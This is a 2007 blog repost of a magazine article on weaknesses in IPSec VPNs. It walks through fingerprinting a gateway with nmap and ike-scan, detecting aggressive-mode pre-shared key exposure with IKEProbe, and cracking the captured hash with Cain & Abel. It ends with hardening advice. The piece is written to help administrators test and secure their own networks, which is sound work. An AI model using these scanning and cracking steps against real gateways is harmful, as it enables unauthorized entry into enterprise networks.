Tuesday, February 6, 2007

Virtual Private Network Security Threat

Dynamic Security can dry up the reserve of passwords that hackers use to penetrate VPNs.


Michael Thumann

Breaking into a VPN

Sloppy configurations make for unsecured VPNs

The IP extension IPSec is generally considered the most secure VPN technology. But it also has its weak points that special tools can find and exploit. Prudent administrators therefore test their own network – before the hackers do.

Virtual Private Networks (VPNs) can save a lot of money by using the Internet to transport data instead of expensive dedicated lines, and modern encryption and authentication methods can ensure the confidentiality of data sent across such public networks. Currently, the most important protocol for the implementation of VPNs is IPSec, which is unfortunately also the most complex. IPSec can not only be used to link complete enterprise networks to the Internet, but also to connect mobile users to their company's email and database server.

At the same time, this complexity can itself become a security risk. You need expertise and experience to configure IPSec-based VPNs correctly -- two requirements that an astonishing number of administrators do not sufficiently meet. In combination with lazy use of default settings in many devices and programs, underskilled administrators create preventable weak points that leave open dangerous points of entry for hackers.

Last stop: security

VPN encryption is almost impossible to crack itself, so the best place to try to get into a VPN are the two end points. On the one hand, we have VPN gateways, a company's central dial-in point; on the other, the VPN client of mobile users, such as notebooks.

The most common target of hackers is generally notebooks, starting from theft to entry via security holes in the operating system or applications running on it. Wireless networks in hotels and airports offer hackers promising opportunities because in such places it is very probable that they will find someone setting up a VPN tunnel to their company to exchange data.

While most vendors of VPN solutions offer special client software with an integrated firewall to prevent access to the computer, not all of them actually install and enable the software. Once VPN access has been set up, hackers are able to move around within the enterprise network via the hacked device and get access to confidential information -- if they haven't already found it on the local hard drive.

But the company's gateway may also offer hackers a few entry points. And unlike mobile devices, it is of necessity constantly reachable via the Internet, making it directly exposed to attacks.

Footprints

In preparing for an attack, hackers first collect all available information. A VPN gateway is relatively easy to identify. All you need is a port scanner like nmap, which will produce output such as the following: 

# nmap -sSUV -O 10.1.1.254 
Starting nmap 3.70 (Interesting ports on 10.1.1.254: 
PORT      STATE         SERVICE
256/tcp   open          fw1-secureremote   
257/tcp   open          fw1-log service 
259/udp   openfiltered firewall1-rdp 
500/udp   openfiltered isakmp 
1701/udp  openfiltered L2TP 
Device type: firewall 
Running: Checkpoint Windows NT/2K/XP 
OS details: Checkpoint SecurePlatform NG FP3

The characteristics of the port reached shows that the firewall is from Checkpoint. The fingerprinting that nmap uses and the service discovery (not shown above) also suggest that a Firewall-1 NG was just detected on the SecurePlatform. The UDP Port 500 is a clear sign that this firewall also runs as a VPN gateway. VPNs use this port to process the protected exchange of keys via IKE (Internet Key Exchange), an essential part of IPSec.

Fingerprints

Special tools can even detect the cryptographic methods and parameters that the gateway uses, providing even more indications of the vendor. The free program IKE-Scan [1] handles this task: 

 
#ike-scan 10.1.1.254 --trans=5,2,1,5 -o 
Starting ike-scan 1.2 with 1 hosts  
10.1.1.254 
IKE Main Mode Handshake returned (1 transforms) 
  
IKE Backoff Patterns: 
  
IP Address   No.     Recv time               Delta Time 
10.1.1.254   1       1092956328.817392       0.000000 
10.1.1.254   2       1092956330.923392       2.106000 
10.1.1.254   3       1092956332.885392       1.962000 
10.1.1.254   4       1092956334.833392       1.948000 
10.1.1.254   5       1092956336.836392       2.003000 
10.1.1.254   6       1092956338.835392       1.999000 
10.1.1.254   7       1092956340.844392       2.009000 
10.1.1.254   8       1092956344.875392       4.031000 
10.1.1.254   9       1092956348.882392       4.007000 
10.1.1.254   10      1092956352.866392       3.984000 
10.1.1.254   11      1092956356.902392       4.036000 
10.1.1.254   12      1092956360.883392       3.981000 
10.1.1.254   Implementation guess: Firewall-1 4.1/NG

The option "-trans=5,2,1,5 " indicates the parameters to be tested: 3DES, SHA, Preshared Key, Diffie Hellman group 5. The message "IKE Main Mode Handshake returned" indicates that the VPN gateway accepts these parameters, and the name of the vendor is displayed immediately. But these tools can only be used successfully if the VPN gateway is configured in a certain way and supports certain parameters. Here, it often helps to try out the IKE and IPSec parameters manually or by means of a script.

Too fast

It is perhaps a matter of opinion as to whether the disclosure of such information should be considered a security problem. The operator of a VPN has a real problem if hackers manage to crack authentication and log in at the gateway. Under certain circumstances, however, this may not even be difficult -- for example, if a pre-shared key (PSK) is used for authentication and the gateway is working in "aggressive mode." Aggressive mode shortens the IKE handshake for the exchange of keys to speed things up. Instead of the six packets used in the conservative main mode, only three are transmitted. But speeding things up this way comes at a price: the aggressive mode is vulnerable to targeted attacks.

For authentication, the gateway transmits a hash value derived from the PSK through the network. As this hash is not encrypted, it may be possible to reconstruct the pre-shared key in dictionary attack or brute-force attack [2]. Depending on the quality of the keys, the attack may be successful in just a few minutes, a few months, or a few years. It is not especially hard to get the hash: the VPN gateway transmits it through the network in the aggressive mode during an attempt to contact a VPN client.

Script kiddy

The IKEProbe developed by ERNW scans VPNs for weak spots and can be used to find such holes in IPSec VPN Gateways [3]. To do so, the tool simulates a VPN client and attempts an IKE handshake in the aggressive mode. It tests all of the IKE parameters supported and checks whether the gateway transmits the PSK hash. As soon as a response comes, the gateway is vulnerable. A scan of a vulnerable gateway with IKEProbe might look like this: 

 
#ikeprobe 10.1.1.254 
IKE Aggressive Mode PSK Vulnerability Scanner 
Supported Attributes 
Ciphers              : DES, 3DES, AES-128, CAST 
Hashes               : MD5, SHA1 
Diffie Hellman Groups: DH Groups 1, 2 and 5 
  
IKE Proposal for Peer: 10.1.1.254 
Aggressive Mode activated ...   
Attribute Settings: 
Cipher DES 
Hash SHA1 
Diffie Hellman Group 1 
    
0.000 3: ph1_initiated(00443ee0, 00384708)   
0.010 3: < ph1 (00443ee0, 244)   
0.030 3: > 40   
0.030 2: sx_recv_notify: invalid doi   
2.532 3: < ph1 (00443ee0, 244)   
5.537 3: < ph1 (00443ee0, 244)   
8.541 3: ph1_disposed(00443ee0) 
(...) 
Attribute Settings: 
Cipher 3DES 
Hash SHA1 
Diffie Hellman Group 5 
   
64.551 3: ph1_initiated(00443ee0, 00384708)   
64.662 3: < ph1 (00443ee0, 340)   
64.692 3: > 328  
64.842 3: ph1_get_psk(00443ee0) 
   
System is vulnerable!!

Hash cracked

It is astonishingly easy to attack such a vulnerable VPN gateway. Cain & Abel, a password sniffing and cracking tool, can monitor whilst IKEProbe is running and extract the hash with its IKE parser [4].

image 1 [489 x 133 Pixel @ 16,8 KB]

Cain sniffs the hash value during the IKE handshake between IKEProbe and the gateway

But Cain & Abel can do more: it uses its password cracker to get the right key for the hash, either by means of a dictionary attack or a brute-force attack depending on the configuration. In principle, a good key cannot be cracked within a reasonable timeframe. However, good pre-shared keys are surprisingly rare in practice.

One reason for this is that people still think that such attacks are harder than they actually are. For instance, it takes less than one minute to try out a list of one million words. Even a somewhat old PC with a 1.2GHz processor would only need around two hours to try out all combinations of lowercase letters for a six-character key. Adding two more characters would mean the computer needs 55 days. If uppercase letters and numbers are allowed, the operation would take 148 years.

image 2 [490 x 179 Pixel @ 21,9 KB]

Cain has succeeded in calculating the pre-shared key

All you need to get a cracked key to enable a connection to a VPN gateway is a normal VPN client, such as PGPNet in PGP or Sentinel [5]. To get actual access to the enterprise network, hackers still have to guess the right IP subnetworks behind the gateway -- but that is just a matter of time. A firewall behind the gateway would, however, limit access to network resources. VPN gateways are therefore often placed in a separate, demilitarized zone (DMZ) so the unencrypted connections to the LAN can be filtered again.

Safety net

Whether a VPN gateway uses the risky aggressive mode depends on the settings. In some products, it is even the standard setting, such as in some Cisco equipment and old versions of Checkpoint's Firewall-1. In contrast, other implementations such as FreeS/Wan do without it altogether and restrict IKE to the conservative main mode, which all IPSec implementations have to support.

The easiest way to prevent the security risks described here is to forego pre-shared keys completely and use Smartcards, HardwareTokens, and X.509 certificates instead. If you have to use PSKs for authentication because your network budget gives you no option and it would be too much trouble to switch, use keys that are at least 20 characters long and consist of letters, numbers and special characters. And be sure to stay clear of aggressive mode. (dab)

References

[1] IKE-Scan

[2] Brute Force - Attacks on passwords in Windows networks

[3] IKEProbe

[4] Cain & Abel

[5] PSK Cracking using IKE Aggressive Mode

[6] Cisco Security Notice: Response to BugTraq - Internet Key Exchange Issue

Labels: ,

posted by Made4biz Security at 10:42 AM  

0 Comments:

Post a Comment

<< Home

Made4biz Security Translating real-world security knowhow into state of the art security systems.

Links

Made4biz Security

Turn on Sound for Demos:
Bill Gates Demo (Location-based)
Elvis Demo (Location/Context-based)
Clint Eastwood Demo (Temporal-based)

Previous Posts

Powered by Blogger

Subscribe to
Posts [Atom]

Technorati Profile

RSS Syndication

Made4Biz Security Inc